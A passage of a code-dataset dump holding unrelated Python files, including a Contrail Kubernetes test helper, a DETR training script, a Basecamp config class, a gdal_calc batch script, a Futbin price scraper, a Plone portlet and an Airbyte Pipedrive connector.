parent_obj=self.connections.vnc_lib_fixture.get_project_obj())\n vmi_obj.add_virtual_network(vn_obj)\n self.vnc_lib.virtual_machine_interface_create(vmi_obj)\n self.addCleanup(self.vnc_lib.virtual_machine_interface_delete, id=vmi_obj.uuid)\n\n # Connect namespace VN to router\n router_obj.add_virtual_machine_interface(vmi_obj)\n self.addCleanup(self._remove_namespace_from_router,router_obj,vmi_obj)\n\n # Update logical router object\n self.vnc_lib.logical_router_update(router_obj)\n\n return router_obj\n\n def _remove_namespace_from_router(self, router_obj, vmi_obj):\n router_obj.del_virtual_machine_interface(vmi_obj)\n # Update logical router object\n self.vnc_lib.logical_router_update(router_obj)\n \n\n def configure_snat_for_pod (self, pod):\n \n # Create logical router \n router_obj = self.create_snat_router(\"snat_router\")\n\n # Connect router with virtual network associated to pod \n self.connect_vn_with_router(router_obj, pod.vn_fq_names[0])\n \n # Configure external_gateway\n self.connections.vnc_lib_fixture.vnc_h.connect_gateway_with_router(router_obj,\\\n self.public_vn.public_vn_fixture.obj)\n # end configure_snat_for_pod\n\n def verify_reachability(self, source_pod, dest_pods):\n '''\n Returns (boolean, list of booleans)\n '''\n results = []\n for dest_pod in dest_pods:\n result = source_pod.ping_with_certainty(dest_pod.pod_ip)\n results.append(result)\n final_result = all(results)\n return (final_result, results)\n # end verify_reachability\n\n def setup_tls_secret(self,\n name=None,\n namespace='default',\n metadata=None,\n data=None,\n **kwargs):\n name = name or get_random_name('secret')\n metadata = metadata or {}\n data = data or {}\n metadata['name'] = metadata.get('name') or name\n return self.useFixture(TLSSecretFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n data=data,\n **kwargs))\n # end setup_tls_secret\n \n def setup_vn(self, \n project_name = None,\n connections = None,\n inputs = None,\n vn_name = None,\n option = \"contrail\"):\n project_name = self.inputs.project_name,\n connections = self.connections\n inputs = self.inputs\n vn_name = vn_name or get_random_name('vn_test')\n return self.useFixture(VNFixture(project_name=project_name,\n connections=connections,\n inputs=inputs, \n vn_name=vn_name,\n option=option))\n\n def delete_cluster_project(self):\n \"\"\"\n This method is used to enable the project isolation by deleting the \n definition of cluster_project from kubernetes.conf.\n It also returns the project it is deleting so that the same can be configured\n as part of cleanup\n \"\"\"\n cmd = 'grep \"^[ \\t]*cluster_project\" /etc/contrail/contrail-kubernetes.conf'\n cp_line = self.inputs.run_cmd_on_server(self.inputs.kube_manager_ips[0],\n cmd, container='contrail-kube-manager')\n if 'cluster_project' in cp_line:\n m = re.match('[ ]*cluster_project.*project(.*)', cp_line)\n if m:\n project = m.group(1).strip(\"'\\\": \").split(\",\")[0].strip(\"'\\\"\")\n cmd = 'sed -i \"/^cluster_project/d\" /etc/contrail/contrail-kubernetes.conf'\n for kube_manager in self.inputs.kube_manager_ips:\n self.inputs.run_cmd_on_server(kube_manager, cmd, \n container='contrail-kube-manager')\n else:\n project = None\n return project\n else:\n self.logger.warn(\"cluster_project not set. Hence skipping delete\")\n return\n self.restart_kube_manager()\n time.sleep(10)\n return project\n #end delete_cluster_project\n \n def add_cluster_project(self, project_name = None):\n \"\"\"\n This method is used to add cluster_project in kubernetes.conf.\n This will inturn disable project level isolation as well.\n \"\"\"\n if project_name ==None:\n self.logger.warn(\"No project to be added as cluster_project\")\n return\n cmd = 'grep \"^[ \\t]*cluster_project\" /etc/contrail/contrail-kubernetes.conf'\n cp_line = self.inputs.run_cmd_on_server(self.inputs.kube_manager_ips[0],\n cmd, container='contrail-kube-manager')\n if 'cluster_project' in cp_line:\n self.logger.warn(\"cluster_project already present in kubernetes.conf\")\n return\n cmd = r'sed -i \"/KUBERNETES/a cluster_project = {\\\\\"project\\\\\": \\\\\"%s\\\\\", \\\\\"domain\\\\\": \\\\\"default-domain\\\\\"}\" /etc/contrail/contrail-kubernetes.conf' \\\n % project_name\n for kube_manager in self.inputs.kube_manager_ips:\n self.inputs.run_cmd_on_server(kube_manager, cmd, \n container='contrail-kube-manager')\n self.restart_kube_manager()\n time.sleep(10)\n #end add_cluster_project\n\n","sub_path":"common/k8s/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":37978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61121021","text":"import sys\nimport os\nroot_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..', '..'))\nsys.path.append(root_path)\ndefault_config_path = os.path.join(root_path, 'config', 'detr_tracking_variants', 'encoder_shared_params_decoder_cross_attn_2_resnet50_lrdrop80')\n\nimport argparse\nfrom pathlib import Path\nimport Utils.detr_misc as utils\nfrom training.detr_tracking_variants.training_loop import training_loop\nfrom training.detr_tracking_variants.encoder_shared_params_decoder_cross_attn_decoder_no_z_mask.builder import build_training_actor_and_dataloader\nfrom Utils.yaml_config import load_config\nfrom workarounds.all import apply_all_workarounds\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Set transformer tracker parameters', add_help=False)\n parser.add_argument('--net_config', type=str, default=os.path.join(default_config_path, 'network.yaml'), help='Path to the net config')\n parser.add_argument('--train_config', type=str, default=os.path.join(default_config_path, 'train.yaml'), help='Path to the train config')\n parser.add_argument('--train_dataset_config', type=str, default=os.path.join(default_config_path, 'dataset', 'train.yaml'), help='Path to the train dataset config')\n parser.add_argument('--val_dataset_config', type=str, default=os.path.join(default_config_path, 'dataset', 'val.yaml'), help='Path to the val dataset config')\n\n parser.add_argument('--output_dir', default='',\n help='path where to save, empty for no saving')\n parser.add_argument('--device', default='cuda',\n help='device to use for training / testing')\n parser.add_argument('--seed', default=42, type=int)\n parser.add_argument('--resume', default='', help='resume from checkpoint')\n parser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch')\n parser.add_argument('--num_workers', default=2, type=int)\n\n # distributed training parameters\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes')\n parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')\n return parser\n\n\ndef main(args):\n utils.init_distributed_mode(args)\n print(\"git:\\n {}\\n\".format(utils.get_sha()))\n\n print(args)\n\n # fix the seed for reproducibility\n seed = args.seed + utils.get_rank()\n apply_all_workarounds(seed)\n\n net_config = load_config(args.net_config)\n train_config = load_config(args.train_config)\n\n actor, train_data_loader, val_data_loader = build_training_actor_and_dataloader(args, net_config, train_config, args.train_dataset_config, args.val_dataset_config)\n training_loop(args, train_config, actor, train_data_loader, val_data_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('DETR tracker training script', parents=[get_args_parser()])\n args = parser.parse_args()\n if args.output_dir:\n Path(args.output_dir).mkdir(parents=True, exist_ok=True)\n\n main(args)\n","sub_path":"entry/detr_tracking_variants/encoder_shared_params_decoder_cross_attn_resnet50_decoder_no_z_mask/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"542853021","text":"\"\"\"\nA configuration object used by the API object. Looks for a basecamp.conf file at startup and makes it a variable\ncalled GLOBAL. If nothing is specified when you make a Basecamp API object, the GLOBAL configuration will be used.\n\nReads from INI files. Also writes back to the INI files if you use this API to obtain access or refresh tokens.\n\"\"\"\ntry:\n from ConfigParser import SafeConfigParser as ConfigParser, NoSectionError, NoOptionError\nexcept ImportError:\n from configparser import ConfigParser, NoSectionError, NoOptionError\n\nfrom datetime import datetime, timedelta\nimport logging\nimport os\nimport six\n\nfrom .exc import *\n\n\nclass BasecampConfig(object):\n DEFAULT_CONFIG_FILE_LOCATIONS = [\n \"basecamp.conf\", # current directory\n os.path.expanduser(\"~/.conf/basecamp.conf\"), # user profile directory/.conf/basecamp.conf\n \"/etc/basecamp.conf\",\n ]\n\n def __init__(self, client_id=None, client_secret=None, redirect_uri=None, user_email=None, user_pass=None,\n access_token=None, access_expires=None, refresh_token=None, filepath=None):\n self.client_id = client_id\n self.client_secret = client_secret\n self.redirect_uri = redirect_uri\n self.user_email = user_email\n self.user_pass = user_pass\n self.access_token = access_token\n self._access_expires = datetime.min\n if access_expires is not None:\n self.access_expires = access_expires\n self.refresh_token = refresh_token\n self.filepath = filepath\n\n @property\n def access_expires(self):\n return self._access_expires\n\n @access_expires.setter\n def access_expires(self, value):\n if isinstance(value, datetime):\n self._access_expires = value\n return\n\n try:\n value = float(value)\n value = datetime.now() + timedelta(seconds=value)\n except:\n raise ValueError(\"`access_expires` needs to be a float (number of seconds until expiration) \"\n \"or a datetime. Got a `%s`.\" % type(value).__name__)\n self._access_expires = value\n\n def read(self, filepath):\n config = ConfigParser()\n config.read(filepath)\n attrs = [k for k in self.__dict__.keys() if k not in ('filepath', '_access_expires')]\n attrs.append('access_expires')\n for key in attrs:\n try:\n value = config.get('BASECAMP', key)\n if key == \"access_expires\":\n value = datetime.utcfromtimestamp(float(value))\n setattr(self, key, value)\n except NoOptionError:\n pass\n self.filepath = filepath\n\n def save(self, filepath=None):\n if filepath is None:\n filepath = self.filepath\n if filepath is not None:\n try:\n os.makedirs(os.path.dirname(filepath), mode=0o770)\n except OSError:\n pass # folder probably already exists\n \n config = ConfigParser()\n config.add_section('BASECAMP')\n attrs = [k for k in self.__dict__.keys() if k != 'filepath']\n for key in attrs:\n try:\n value = getattr(self, key)\n if value is None:\n continue\n if key == \"_access_expires\":\n key = \"access_expires\"\n try:\n value = value.timestamp()\n except:\n continue # if timestamp is at min value, this will fail, that's ok\n \n config.set('BASECAMP', key, six.text_type(value))\n setattr(self, key, value)\n except (NoSectionError, NoOptionError):\n pass\n with open(filepath, \"w\") as fileout:\n config.write(fileout)\n self.filepath = filepath\n\n @classmethod\n def from_filepath(cls, filepath):\n if not os.path.exists(filepath):\n raise IOError(\"Non-existent configuration file '%s'\" % filepath)\n new_config = cls()\n new_config.read(filepath)\n return new_config\n\n @classmethod\n def load_from_default_paths(cls):\n for config_file in cls.DEFAULT_CONFIG_FILE_LOCATIONS:\n try:\n return cls.from_filepath(config_file)\n except Exception as ex:\n logging.debug(\"%s: %s is missing or invalid.\", type(ex).__name__, config_file)\n else:\n raise NoDefaultConfigurationFound()\n","sub_path":"basecampy3/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"609998343","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport json\n\nfrom atomic_reactor.plugins.input_osv3 import OSv3InputPlugin\n\nimport pytest\nfrom flexmock import flexmock\n\n@pytest.mark.parametrize('prebuild_json,expected_json', [\n ([],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'pull_base_image' }],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}],\n [{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}]\n ),\n ([{ 'name': 'change_source_registry' }],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'change_source_registry',\n 'args': { 'registry_uri': 'localhost:666', 'insecure_registry': True }}],\n [{ 'name': 'pull_base_image',\n 'args': { 'parent_registry': 'localhost:666', 'parent_registry_insecure': True }}]\n ),\n ([{ 'name': 'change_source_registry' }, { 'name': 'pull_base_image', 'args': { 'a': 'b' }}],\n [{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}]\n ),\n])\ndef test_prebuild_plugins_rewrite(prebuild_json, expected_json):\n plugins_json = {\n 'prebuild_plugins': prebuild_json,\n }\n\n mock_env = {\n 'BUILD': '\"UNUSED\"',\n 'SOURCE_URI': 'https://github.com/foo/bar.git',\n 'SOURCE_REF': 'master',\n 'OUTPUT_IMAGE': 'asdf:fdsa',\n 'OUTPUT_REGISTRY': 'localhost:5000',\n 'DOCK_PLUGINS': json.dumps(plugins_json),\n }\n flexmock(os, environ=mock_env)\n\n plugin = OSv3InputPlugin()\n assert plugin.run()['prebuild_plugins'] == expected_json\n","sub_path":"tests/plugins/test_input_osv3.py","file_name":"test_input_osv3.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"133785543","text":"import os\nimport os\nimport sys\nimport datetime\nimport time\nfrom google.cloud import storage\ntry:\n from progress.bar import IncrementalBar\nexcept ImportError:\n pass\n\ncalc_factor = 0.85\n\ntarget_dir = '~/Google Drive/California_Land_IQ_Boundaries/Land_IQ_CDL_hybrid_land_use'\ntarget_dir = os.path.expanduser(target_dir)\noutput_dir = os.path.join(target_dir, 'modified')\noutput_dir = os.path.expanduser(output_dir)\n\n\n\ndef main():\n # print(\"Main\")\n # print(folder)\n\n if not os.path.exists(output_dir):\n print(\"Creating output directory: \\n{}\\n\".format(output_dir))\n os.makedirs(output_dir)\n\n ###Create list of files in dir\n # raster\n raster_list = os.listdir(target_dir)\n # bar = IncrementalBar('Rasters', max=len(raster_list))\n\n for raster in raster_list:\n # if raster.endswith(\".tif\"):\n if raster.endswith(\".img\"):\n\n raster_path = os.path.join(target_dir, raster)\n output_path = os.path.join(output_dir, raster)\n\n print(raster)\n # print(raster_path)\n # print(output_path)\n # os.sys.exit()\n\n # bar.next()\n # print(dir_content)\n # merge_list.append(os.path.join(sub_dir_path, dir_content))\n\n ###gdal_calc.py command\n ratio_command = r'gdal_calc.py -A {} --outfile={} --calc=A*{}'.format(raster_path, output_path, calc_factor)\n replace_command = r'gdal_calc.py -A {} --outfile={} --calc=(A*(A!=62))+(176*(A=62))'.format(raster_path, output_path,\n calc_factor)\n calc_command = replace_command\n os.system(calc_command)\n time.sleep(30)\n\n\n\n # bar.finish()\n\n\n\n\n ### Copy all contents of bucket to dir\n # gsutil -m cp -r gs://openet_geodatabase/field_boundaries_shapefiles_staged /Users/mbromley/field_boundaries_shapefiles_staged/\n\n ### Iterate through all states\n # if 'progress' in sys.modules:\n # bar = IncrementalBar('States', max = len(states))\n # for state in states:\n # bar.next()\n # # time.sleep(0.1)\n #\n # ### Command line argument\n # os.system(\"echo Processing {}!\".format(state))\n # bar.finish()\n\n # os.system(\"gsutil -m cp -r gs://{} {}\".format(Gbucket, folder))\n\nif __name__ == \"__main__\":\n main()","sub_path":"OpenET-Personal_Tools/Bulk_gdal_calc/Bulk_gdal_calc_replace_value.py","file_name":"Bulk_gdal_calc_replace_value.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374334044","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/site-packages/pycrunchbase/resource/fundinground.py\n# Compiled at: 2017-01-13 23:45:16\nimport six\nfrom .node import Node\nfrom .utils import parse_date\n\n@six.python_2_unicode_compatible\nclass FundingRound(Node):\n \"\"\"Represents a FundingRound on CrunchBase\"\"\"\n KNOWN_PROPERTIES = [\n 'permalink',\n 'api_path',\n 'web_path',\n 'funding_type',\n 'series',\n 'series_qualifier',\n 'announced_on',\n 'announced_on_trust_code',\n 'closed_on',\n 'closed_on_trust_code',\n 'money_raised',\n 'money_raised_currency_code',\n 'money_raised_usd',\n 'target_money_raised',\n 'target_money_raised_currency_code',\n 'target_money_raised_usd',\n 'created_at',\n 'updated_at']\n KNOWN_RELATIONSHIPS = [\n 'investments',\n 'funded_organization',\n 'images',\n 'videos',\n 'news']\n\n def _coerce_values(self):\n for attr in ['announced_on']:\n if getattr(self, attr, None):\n setattr(self, attr, parse_date(getattr(self, attr)))\n\n return\n\n def __str__(self):\n return ('{funding_type} ${money} on {announced} by {investments}').format(funding_type=self.funding_type, money=self.money_raised_usd, announced=self.announced_on, investments=self.investments)\n\n def __repr__(self):\n return self.__str__()","sub_path":"pycfiles/pycrusher-0.3.8.tar/fundinground.py","file_name":"fundinground.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"384330356","text":"from bs4 import BeautifulSoup\nimport aiohttp\n\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n\n return await response.text()\n\n\nasync def fetch_json(session, url):\n async with session.get(url) as response:\n return await response.json()\n\n\nasync def check_price_by_id(data_tuple):\n player_id = data_tuple[0]\n url = \"https://www.futbin.com/19/player/\" + player_id\n async with aiohttp.ClientSession() as session:\n web_page = await fetch(session, url)\n soup = BeautifulSoup(web_page, 'html.parser')\n price_id = str(soup.find(id=\"page-info\")).split('data-player-resource=\"')[1].partition('\"')[0]\n url = \"https://www.futbin.com/19/playerPrices?player=\" + price_id\n async with aiohttp.ClientSession() as session:\n web_page = await fetch(session, url)\n price_string = str(web_page)\n player_price = price_string.split('\"ps\":{\"LCPrice\":\"')[1].partition('\"')[0]\n return player_price, data_tuple[1], data_tuple[2]\n\n\nasync def get_player_id_by_name_and_rating(name, rating, version=\"Normal\"):\n url = \"https://www.futbin.com/search?year=19&term=\" + str(name)\n async with aiohttp.ClientSession() as session:\n web_page = await fetch_json(session, url)\n list_of_players_raw_data = web_page\n list_of_parsed_players = []\n for x in list_of_players_raw_data:\n temp_dict = dict()\n temp_dict[\"name\"] = x[\"name\"]\n temp_dict[\"rating\"] = x[\"rating\"]\n temp_dict[\"id\"] = x[\"id\"]\n temp_dict[\"full_name\"] = x[\"full_name\"]\n temp_dict[\"version\"] = x[\"version\"]\n list_of_parsed_players.append(temp_dict)\n for x in list_of_parsed_players:\n if not(version == \"Normal\"):\n if x[\"rating\"] == rating and x[\"version\"] == version:\n return x[\"id\"], x[\"name\"], x[\"rating\"]\n else:\n if x[\"rating\"] == rating:\n return x[\"id\"], x[\"name\"], x[\"rating\"]\n return \"FAILED\"\n","sub_path":"asynchronous_price_check.py","file_name":"asynchronous_price_check.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522648902","text":"from zope.interface import implements\nfrom AccessControl import getSecurityManager\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.app.portlets.portlets import base\n#from plone.portlet.collection.collection import Renderer as baseRenderer\nfrom zope.component import getMultiAdapter\nfrom Acquisition import aq_inner\n\nfrom zope import schema\nfrom zope.formlib import form\nfrom plone.memoize.instance import memoize\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom plone.portlet.collection import PloneMessageFactory as _a\nfrom my315ok.portlet.rollitems import RollPortletMessageFactory as _\n\n##class ICollectionPortlet(IPortletDataProvider):\nclass IRollPortlet(IPortletDataProvider):\n \"\"\"A portlet which renders the results of a collection object.\n \"\"\"\n\n header = schema.TextLine(title=_a(u\"Portlet header\"),\n description=_a(u\"Title of the rendered portlet\"),\n required=True)\n ajaxsrc = schema.TextLine(title=_(u\"target URI\"),\n description=_(u\"the URI of the resouce images view\"),\n required=True)\t\t\t\t \n show_more = schema.Bool(title=_a(u\"Show more... link\"),\n description=_a(u\"If enabled, a more... link will appear in the footer of the portlet, \"\n \"linking to the underlying Collection.\"),\n required=True,\n default=True)\n show_text = schema.Bool(title=_a(u\"Show text\"),\n description=_a(u\"If enabled, will display text description under image .\"),\n required=True,\n default=False)\n topid = schema.TextLine(title=_a(u\"top id\"),\n description=_a(u\"the wraped top id of the roll zone\"),\n required=True)\n cssid = schema.TextLine(title=_a(u\"css id\"),\n description=_a(u\"the css id of the roll zone\"),\n required=True)\n roll_direc = schema.Choice(\n title=_(u\"direction\"),\n description=_(u\"Choose the roll direction\"),\n vocabulary = 'rollitems.RollDirectionVocabulary' )\n \n speed = schema.Int(title=_(u\"speed\"),\n description=_(u\"Specify the speed of the roll items \"), \n required=True)\n pause = schema.Int(title=_(u\"pause time\"),\n description=_(u\"Specify the time of pause(ms)\"),\n required=True)\n step = schema.Int(title=_(u\"step length\"),\n description=_(u\"Specify the step length of every move.\"),\n required=True)\n\nclass Assignment(base.Assignment):\n \"\"\"\n Portlet assignment. \n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n implements(IRollPortlet)\n header = u\"\"\n ajaxsrc = u\"\"\n show_more = True\n topid = u\"\"\n cssid = u\"\"\n roll_direc = \"left\"\n speed = 30\n pause = 1000\n step = 1\n show_text = False\n\n def __init__(self, header=u\"\", ajaxsrc=u\"\", show_more=True,topid=u\"\",\n cssid=u\"\",roll_direc=\"left\",speed=None,pause=None,step=None,show_text=False):\n self.header = header\n self.ajaxsrc = ajaxsrc\n self.show_more = show_more\n self.show_text = show_text\n self.speed = speed\n self.pause = pause\n self.step = step\n self.topid = topid\n self.cssid = cssid\n self.roll_direc = roll_direc\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet in the\n \"manage portlets\" screen. Here, we use the title that the user gave.\n \"\"\"\n return self.header\n\n\nclass Renderer(base.Renderer):\n \"\"\"Portlet renderer.\n \n This is registered in configure.zcml. The referenced page template is\n rendered, and the implicit variable 'view' will refer to an instance\n of this class. Other methods can be added and referenced in the template.\n \"\"\"\n\n render = ViewPageTemplateFile('rollportlet.pt')\n \n#\n# def __init__(self, *args):\n# base.Renderer.__init__(self, *args)\n \n @memoize\n def render_marqueejs(self):\n cssid = self.data.cssid \n imgsrc = self.data.ajaxsrc\n context = aq_inner(self.context)\n portal_state = getMultiAdapter((context, self.request), name=u'plone_portal_state')\n portal_url = portal_state.portal_url()\n if imgsrc[:4] != 'http':\n imgsrc = portal_url + '/' + imgsrc \n topid = self.data.topid\n if self.data.show_text:\n showtext = 1\n else:\n showtext = 0 \n out=\"\"\"$(document).ready(function(){ajaxfetchimg(\"%(topid)s\",\"%(url)s\",\".%(mid)s\",%(text)s);});\"\"\" % dict(topid=topid,url=imgsrc,mid=cssid,text=showtext)\n return out \n\n \nclass AddForm(base.AddForm):\n \"\"\"Portlet add form.\n \n This is registered in configure.zcml. The form_fields variable tells\n zope.formlib which fields to display. The create() method actually\n constructs the assignment that is being added.\n \"\"\"\n form_fields = form.Fields(IRollPortlet)\n description = _a(u\"This portlet display a listing of items from a Collection.\")\n\n def create(self, data):\n return Assignment(**data)\n\nclass EditForm(base.EditForm):\n \"\"\"Portlet edit form.\n \n This is registered with configure.zcml. The form_fields variable tells\n zope.formlib which fields to display.\n \"\"\"\n\n form_fields = form.Fields(IRollPortlet)\n label = _a(u\"Edit Collection Portlet\")\n description = _a(u\"This portlet display a listing of items from a Collection.\")\n","sub_path":"my315ok/portlet/rollitems/rollportlet.py","file_name":"rollportlet.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571180569","text":"import psycopg2\nimport csv\nimport glob\nimport os\nimport sys\nsys.path.append('/opt/config')\nimport config\n\n\ncon=psycopg2.connect(dbname=config.DB_NAME, host=config.DB_HOST,port=5439,user=config.DB_USER, password=config.DB_PASS)\ncur = con.cursor()\n\ndirs_in_dir = []\nlocation='/home/ec2-user/workspace/analytics_engineering_marts/ddl/deploy'\nprint(location)\n\nfileset = [file for file in glob.glob(location + \"**/*.sql\", recursive=True)]\n\nfor file in fileset:\n f1 = open(file, \"r\")\n query=f1.read()\n sqlCommands = query.split(';')\n for i in sqlCommands:\n print(i)\n cur.execute(i)\n con.commit()\n f1.close()\ncur.close()\n","sub_path":"data_model/ddl/Redshift_ddl/back/pyscript/redshift_execute_ddl_dml.py","file_name":"redshift_execute_ddl_dml.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544155793","text":"#\n# Copyright (c) 2021 Airbyte, Inc., all rights reserved.\n#\n\n\nfrom typing import Any, List, Mapping, Tuple\n\nimport pendulum\nfrom airbyte_cdk.logger import AirbyteLogger\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources import AbstractSource\nfrom airbyte_cdk.sources.streams import Stream\nfrom source_pipedrive.streams import Activities, ActivityFields, Deals, Leads, Organizations, Persons, Pipelines, Stages, Users\n\n\nclass SourcePipedrive(AbstractSource):\n def check_connection(self, logger: AirbyteLogger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n deals = Deals(api_token=config[\"api_token\"], replication_start_date=pendulum.parse(config[\"replication_start_date\"]))\n deals_gen = deals.read_records(sync_mode=SyncMode.full_refresh)\n next(deals_gen)\n return True, None\n except Exception as error:\n return False, f\"Unable to connect to Pipedrive API with the provided credentials - {repr(error)}\"\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n \"\"\"\n :param config: A Mapping of the user input configuration as defined in the connector spec.\n \"\"\"\n stream_kwargs = {\"api_token\": config[\"api_token\"]}\n incremental_stream_kwargs = {**stream_kwargs, \"replication_start_date\": pendulum.parse(config[\"replication_start_date\"])}\n streams = [\n Activities(**incremental_stream_kwargs),\n ActivityFields(**stream_kwargs),\n Deals(**incremental_stream_kwargs),\n Leads(**stream_kwargs),\n Organizations(**incremental_stream_kwargs),\n Persons(**incremental_stream_kwargs),\n Pipelines(**incremental_stream_kwargs),\n Stages(**incremental_stream_kwargs),\n Users(**incremental_stream_kwargs),\n ]\n return streams\n","sub_path":"airbyte-integrations/connectors/source-pipedrive/source_pipedrive/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"540673959","text":"import json\nimport boto3\ns3 = boto3.client('s3')\n\ndef handler(event, context):\n print('received event:')\n print(event)\n print()\n\n accountId = context.invoked_function_arn.split(\":\")[4]\n data = json.loads(event['body'])\n print('data', data)\n s3.put_object(Body=data['template'], Bucket=f\"soardinator-remediation-cfns-{accountId}\", Key=data[\"name\"] + \".yaml\")\n return {\n 'statusCode': 200,\n 'headers': {\n 'Access-Control-Allow-Headers': '*',\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'\n },\n 'body': json.dumps('Uploaded template')\n }","sub_path":"amplify/#current-cloud-backend/function/UploadRemediationTemplate/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570656744","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/uncompyle6/semantics/customize26_27.py\n# Compiled at: 2020-01-14 12:41:01\n\"\"\"Isolate Python 2.6 and 2.7 version-specific semantic actions here.\n\"\"\"\nfrom uncompyle6.semantics.consts import TABLE_DIRECT\n\ndef customize_for_version26_27(self, version):\n if version > 2.6:\n TABLE_DIRECT.update({'except_cond2': ('%|except %c as %c:\\n', 1, 5), 'call_generator': ('%c%P', 0, (1, -1, ', ', 100))})\n else:\n TABLE_DIRECT.update({'testtrue_then': ('not %p', (0, 22))})\n\n def n_call(node):\n mapping = self._get_mapping(node)\n key = node\n for i in mapping[1:]:\n key = key[i]\n\n if key.kind == 'CALL_FUNCTION_1':\n args_node = node[(-2)]\n if args_node == 'expr':\n n = args_node[0]\n if n == 'generator_exp':\n node.kind = 'call_generator'\n self.default(node)\n\n self.n_call = n_call","sub_path":"pycfiles/uncompyle6-3.6.7-py2.4/customize26_27.py","file_name":"customize26_27.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477875684","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/i3visiotools/darkfy/lib/wrappers/darkengine.py\n# Compiled at: 2014-12-25 06:48:18\nimport os, re, copy, logging, i3visiotools.browser as usufybrowser\n\nclass DarkEngine:\n \"\"\" \n class.\n \"\"\"\n\n def __init__(self):\n \"\"\" \n Constructor without parameters...\n Most of the times, this will be the ONLY method needed to be overwritten.\n \"\"\"\n self.name = ''\n self.url = 'http://example.com/?q=' + ''\n self.delimiters = {}\n self.delimiters['start'] = ''\n self.delimiters['end'] = ''\n self.fields = {}\n\n def __str__(self):\n \"\"\" \n Function to obtain the text that represents this object.\n \n :return: str(self.getJson())\n \"\"\"\n return str(self.name)\n\n def getResults(self, word=None):\n r\"\"\" \n Function to recover the.\n \n :param word: word to be searched.\n\n :return: The output format will be like:\n {\"email\" : {\"reg_exp\" : \"[a-zA-Z0-9\\.\\-]+@[a-zA-Z0-9\\.\\-]+\\.[a-zA-Z]+\" , \"found_exp\" : [\"foo@bar.com\", \"bar@foo.com\"] } }\n \"\"\"\n logger = logging.getLogger('darkfy')\n searchURL = self.url.replace('', word)\n logger.debug('Recovering the targetted url (authenticated)...')\n uBrowser = usufybrowser.Browser()\n html = uBrowser.recoverURL(searchURL)\n start = self.delimiters['start']\n end = self.delimiters['end']\n values = re.findall(start + '(.*?)' + end, html, re.DOTALL)\n parsedResults = []\n for val in values:\n newResource = {}\n for field in self.fields.keys():\n foundElems = re.findall(self.fields[field]['start'] + '(.*?)' + self.fields[field]['end'], val, re.DOTALL)\n newResource[field] = self.cleanSpecialChars(foundElems)\n\n parsedResults.append(newResource)\n\n return parsedResults\n\n def cleanSpecialChars(self, auxList):\n \"\"\"\n Method that cleans any text deleting certain special characters and avoiding the text between '<' and '>'.\n \n :param 